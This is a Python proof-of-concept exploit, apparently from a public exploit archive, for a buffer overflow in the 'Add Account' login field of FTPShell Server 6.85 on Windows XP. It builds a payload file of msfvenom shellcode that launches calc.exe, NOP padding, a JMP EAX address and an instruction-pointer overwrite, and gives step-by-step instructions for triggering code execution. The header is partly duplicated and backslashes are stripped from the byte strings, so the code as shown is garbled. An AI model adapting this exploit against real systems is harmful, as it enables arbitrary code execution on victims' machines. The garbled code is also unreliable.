#!/usr/bin/python
# Exploit Title: FTPShell Server 6.85 - Add Account Buffer Overflow
# Date: December 2nd, 2019
# Exploit Author: boku
# Vendor Homepage: http:// #!/usr/bin/python
# Exploit Title: FTPShell Server 6.85 - Add Account Buffer Overflow
# Date: December 2nd, 2019
# Exploit Author: boku
# Vendor Homepage: http://www.ftpshell.com/index.htm
# SOftware Link: http://www.ftpshell.com/downloadserver.htm
# Program Name: FTPShell Server (Secure Plus edition)
# Version: Version 6.85
# Tested on: Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600
# Recreate:
# - Install FTPShell Server v6.85
# - open 'FTPShell Server Administrator'
# - Click button 'Manage FTP Accounts..'
# - Click button 'Configure accounts..'
# - Click button 'Add'
# - Run python script & transfer 'poc.txt' to windows box
# - Open 'poc.txt' & select-all, then copy
# - Paste poc.txt text blob into 'Login' text-box
# - Press button 'OK'; program will crash & shellcode will execute

blt = '33[92m[33[0m+33[92m]33[0m ' # green success bullet
err = '33[91m[33[0m!33[91m]33[0m ' # red fail bullet

try:
f = open('poc.txt', 'w') # open file for write
# Instructions @ Crash:
# 1. mov ecx,[esi+7c0];
# 2. mov eax,[ecx]; lea edx, [ebp-4]; push edx;
# 3. call [eax+2c4];
# exploit leaves 708 bytes for shellcode.
#msfvenom -p windows/exec CMD='calc.exe' -a x86 --platform windows -b 'x00' -v shellcode -f python
#x86/shikata_ga_nai chosen with final size 220
shellcode = b""
shellcode += b"xbbx4fx79xd7xcexdaxdexd9x74x24xf4"
shellcode += b"x5ax2bxc9xb1x31x31x5ax13x83xeaxfc"
shellcode += b"x03x5ax40x9bx22x32xb6xd9xcdxcbx46"
shellcode += b"xbex44x2ex77xfex33x3ax27xcex30x6e"
shellcode += b"xcbxa5x15x9bx58xcbxb1xacxe9x66xe4"
shellcode += b"x83xeaxdbxd4x82x68x26x09x65x51xe9"
shellcode += b"x5cx64x96x14xacx34x4fx52x03xa9xe4"
shellcode += b"x2ex98x42xb6xbfx98xb7x0exc1x89x69"
shellcode += b"x05x98x09x8bxcax90x03x93x0fx9cxda"
shellcode += b"x28xfbx6axddxf8x32x92x72xc5xfbx61"
shellcode += b"x8ax01x3bx9axf9x7bx38x27xfaxbfx43"
shellcode += b"xf3x8fx5bxe3x70x37x80x12x54xaex43"
shellcode += b"x18x11xa4x0cx3cxa4x69x27x38x2dx8c"
shellcode += b"xe8xc9x75xabx2cx92x2exd2x75x7ex80"
shellcode += b"xebx66x21x7dx4execxcfx6axe3xafx85"
shellcode += b"x6dx71xcaxebx6ex89xd5x5bx07xb8x5e"
shellcode += b"x34x50x45xb5x71xaex0fx94xd3x27xd6"
shellcode += b"x4cx66x2axe9xbaxa4x53x6ax4fx54xa0"
shellcode += b"x72x3ax51xecx34xd6x2bx7dxd1xd8x98"
shellcode += b"x7exf0xbax7fxedx98x12x1ax95x3bx6b"
# 3. call [eax+2c4];
# - Hexadecimal 0x2c4 = 708 decimal
junk1 = 'x90' * (708-len(shellcode))
# - The call [eax+2c4] instruction will pass execution to the address located at EAX+708
# - Setting [EAX+708] to an existing JMP EAX instruction will pass execution to our shellcode
# - 0x7c9ef4c9 jmp eax | (Execute&Read) shell32.dll; aslr&rebase: false
jmpEax = 'xc9xf4x9ex7c'
# 1. mov ecx,[esi+7c0];
# - ESI = 0x0012C108
# - esi+7c0 is in our supplied buffer, on the stack, at the time of the crash.
# - Control ECX @ offset 1568 bytes
junk2 = 'x90' * (1568-len(shellcode+junk1+jmpEax))
# 2. mov eax,[ecx];
# - ECX = 0x0012B768 = PTR (located on Stack) to the beginning of our shellcode in the Heap
# - EIP 3-Byte Overwrite - 'x68xb7x12'
ecx = 'x68xb7x12' # - EIP 3-Byte Overwrite - 'x68xb7x12
# - The 'x00' is supplied by the program when pressing the 'OK' button
# - eax is now set to the address of our shellcode.
f.write(shellcode+junk1+jmpEax+junk2+ecx)
f.close() # close the file
print blt + 'poc.txt created successfully'
except:
print err + 'poc.txt failed to create'